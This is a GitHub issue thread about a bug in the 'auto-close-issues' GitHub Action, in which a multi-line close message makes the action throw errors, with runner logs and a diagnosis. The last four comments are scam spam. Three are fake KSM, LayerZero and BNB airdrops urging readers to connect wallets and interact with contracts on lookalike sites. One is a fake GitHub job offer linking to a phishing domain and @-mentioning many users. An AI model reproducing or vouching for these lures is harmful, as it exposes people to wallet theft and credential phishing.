### ISSUE TITLE
Action completes successfully but issue is not closed

### ISSUE THREAD

**Issue by davidmpaz** [lucasbento/auto-close-issues#1]
Hi,

first of all, thanks for this project. I was trying to use it since i am trying to get familiar wit it and Github actions.

Seems everything worked but the result is not the expected like the title says. The logs shows me this:
```
2020-03-27T16:24:48.7041862Z ##[section]Starting: Request a runner to run this job
2020-03-27T16:24:48.8900387Z Requesting a hosted runner in current repository's account/organization with labels: 'ubuntu-latest', require runner match: True
2020-03-27T16:24:48.9791717Z Labels matched hosted runners has been found, waiting for one of them get assigned for this job.
2020-03-27T16:24:49.0479289Z ##[section]Finishing: Request a runner to run this job
2020-03-27T16:24:56.7014831Z Current runner version: '2.165.2'
2020-03-27T16:24:56.7015947Z Prepare workflow directory
2020-03-27T16:24:56.7201290Z Prepare all required actions
2020-03-27T16:24:56.7211954Z Download action repository 'lucasbento/auto-close-issues@v1.0.2'
2020-03-27T16:24:58.0374262Z ##[group]Run lucasbento/auto-close-issues@v1.0.2
2020-03-27T16:24:58.0374671Z with:
2020-03-27T16:24:58.0375143Z   github-token: ***
2020-03-27T16:24:58.0375431Z   issue-close-message: Hello @davidmpaz! :wave:

This issue is being automatically closed because it does not follow the issue template.
2020-03-27T16:24:58.0375721Z   closed-issues-label: ðŸ™ Not following issue template
2020-03-27T16:24:58.0375963Z ##[endgroup]
2020-03-27T16:24:58.4537195Z (node:2514) UnhandledPromiseRejectionWarning: Error: ENOENT: no such file or directory, scandir '.github/ISSUE_TEMPLATE'
2020-03-27T16:24:58.4537543Z     at Object.readdirSync (fs.js:854:3)
2020-03-27T16:24:58.4538034Z     at /home/runner/work/_actions/lucasbento/auto-close-issues/v1.0.2/dist/index.js:10051:29
2020-03-27T16:24:58.4538609Z     at Object.676 (/home/runner/work/_actions/lucasbento/auto-close-issues/v1.0.2/dist/index.js:10128:3)
2020-03-27T16:24:58.4539144Z     at __webpack_require__ (/home/runner/work/_actions/lucasbento/auto-close-issues/v1.0.2/dist/index.js:22:30)
2020-03-27T16:24:58.4539634Z     at startup (/home/runner/work/_actions/lucasbento/auto-close-issues/v1.0.2/dist/index.js:37:19)
2020-03-27T16:24:58.4540101Z     at /home/runner/work/_actions/lucasbento/auto-close-issues/v1.0.2/dist/index.js:43:18
2020-03-27T16:24:58.4540612Z     at Object.<anonymous> (/home/runner/work/_actions/lucasbento/auto-close-issues/v1.0.2/dist/index.js:46:10)
2020-03-27T16:24:58.4540885Z     at Module._compile (internal/modules/cjs/loader.js:959:30)
2020-03-27T16:24:58.4541147Z     at Object.Module._extensions..js (internal/modules/cjs/loader.js:995:10)
2020-03-27T16:24:58.4541407Z     at Module.load (internal/modules/cjs/loader.js:815:32)
2020-03-27T16:24:58.4544762Z (node:2514) UnhandledPromiseRejectionWarning: Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). (rejection id: 1)
2020-03-27T16:24:58.4545900Z (node:2514) [DEP0018] DeprecationWarning: Unhandled promise rejections are deprecated. In the future, promise rejections that are not handled will terminate the Node.js process with a non-zero exit code.
2020-03-27T16:24:58.4571786Z Cleaning up orphan processes
```

Any idea about it?
Thanks in advance and best regards,
David

**Comment by lucasbento** [comment]
Hello @davidmpaz, it seems like it can't find the `.github/ISSUE_TEMPLATE` folder, can you tell me where that folder is located in your project?

**Comment by davidmpaz** [comment]
Hi 👋 @lucasbento,

thanks for your response! I did generate the issues templates with the built in functionality from Github, i can also confirm that they are in the expected directory `.github/ISSUE_TEMPLATE`. the paths to the templates are:

.github/ISSUE_TEMPLATE/bug_report.md
.github/ISSUE_TEMPLATE/feature_request.md

and the content of the templates are the default content that was generated, i haven't change anything.

Best regards,
David

**Comment by lucasbento** [comment]
@davidmpaz: sorry for the delay, being swamped in work.

Would you be able to provide a reproduction repository so I can take a look and test some stuff out?

**Comment by cimnine** [comment]
To me the problem seems to be that the `issue-close-message` is a multiline string. Before I changed the string to be multi-line the bot worked great. Then I changed it and now it's not working anymore.

[Here's the configuration which breaks](https://github.com/cimnine/netbox-docker/blob/0d33eea1a0c1dab8249295a603d17dbfa7665696/.github/workflows/issues.yml).

The log is:

```
2020-04-07T09:45:31.5595495Z ##[group]Run lucasbento/auto-close-issues@v1.0.2
2020-04-07T09:45:31.5595616Z with:
2020-04-07T09:45:31.5596080Z   github-token: ***
2020-04-07T09:45:31.5596278Z   issue-close-message: I'm the annoying robot who closes your issue because I believe you didn't follow the issue template.

If you just came here to ask a question,
please join the [Network To Code][http://slack.networktocode.com/] Slack (it's free) and
ask for help in our [`#netbox-docker` channel][https://slack.com/app_redirect?channel=netbox-docker&team=T09LQ7E9E].
They're usually more supportive than I am :innocent:.

2020-04-07T09:45:31.5596443Z   closed-issues-label: invalid
2020-04-07T09:45:31.5596521Z ##[endgroup]
2020-04-07T09:45:32.8416707Z (node:2670) UnhandledPromiseRejectionWarning: SyntaxError: Unexpected identifier
2020-04-07T09:45:32.8437367Z     at Function (<anonymous>)
2020-04-07T09:45:32.8438958Z     at getIssueCloseMessage (/home/runner/work/_actions/lucasbento/auto-close-issues/v1.0.2/dist/index.js:10035:17)
2020-04-07T09:45:32.8439288Z     at /home/runner/work/_actions/lucasbento/auto-close-issues/v1.0.2/dist/index.js:10118:11
2020-04-07T09:45:32.8440053Z     at processTicksAndRejections (internal/process/task_queues.js:93:5)
2020-04-07T09:45:32.8440593Z (node:2670) UnhandledPromiseRejectionWarning: Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). (rejection id: 1)
2020-04-07T09:45:32.8441382Z (node:2670) [DEP0018] DeprecationWarning: Unhandled promise rejections are deprecated. In the future, promise rejections that are not handled will terminate the Node.js process with a non-zero exit code.
2020-04-07T09:45:32.8458016Z Cleaning up orphan processes
```

**Comment by lucasbento** [comment]
@cimnine: this is an error with your YAML format, try this: https://stackoverflow.com/a/3790497/4252781.

Please open another issue if that doesn't work as it's not the same problem as OP is having.

**Comment by cimnine** [comment]
There's no problem with my yaml:

![Screenshot 2020-04-07 at 12 00 31](https://user-images.githubusercontent.com/804532/78656287-72ea3c80-78c7-11ea-9121-f132cdf0cdd2.png)

See https://yaml-multiline.info/ for the various ways how yaml supports multiline strings.

I believe the problem is here: https://github.com/lucasbento/auto-close-issues/blob/master/src/index.js#L18

If you pass in a multi-line string, this line breaks. Try it!

**Comment by cimnine** [comment]
> Please open another issue if that doesn't work as it's not the same problem as OP is having.

Well to me it does seem it's the same issue. See his log:

```
2020-03-27T16:24:58.0375431Z   issue-close-message: Hello @davidmpaz! :wave:

This issue is being automatically closed because it does not follow the issue template.
```

 Clearly a multi-line string here. Looks like my log.

**Comment by lucasbento** [comment]
Good eye, totally missed that, sorry about it.

I'll investigate this today.

**Comment by davidmpaz** [comment]
Please @lucasbento, check the pull request on the repo i did invite you. 

It is not public yet, but I will release it after I finished playing around with it.

Thanks in advance

**Comment by lucasbento** [comment]
Will do, thank you @davidmpaz!

**Comment by marcelklehr** [comment]
Can confirm it doesn't work.

**Comment by marcelklehr** [comment]
I've created a fork with debugging information that helped me fix this: https://github.com/marcelklehr/auto-close-issues (use @ master)

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by earlyraven** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!

**Comment by shafwansyah** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by thangtq-pionero** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
zilong88, @jon4hz, @balajimore, @Rishat7c, @amovah, @andreykishtov, @mashharuki, @lutherleo, @Bastiaantjuhh, @Mehrdadr01, @liaoren512, @carterax, @hiro1107, @yangzuoqi, @AAH20, @mpeyfuss, @jbpin, @raffaloffredo, @kai63001, @Riudiu
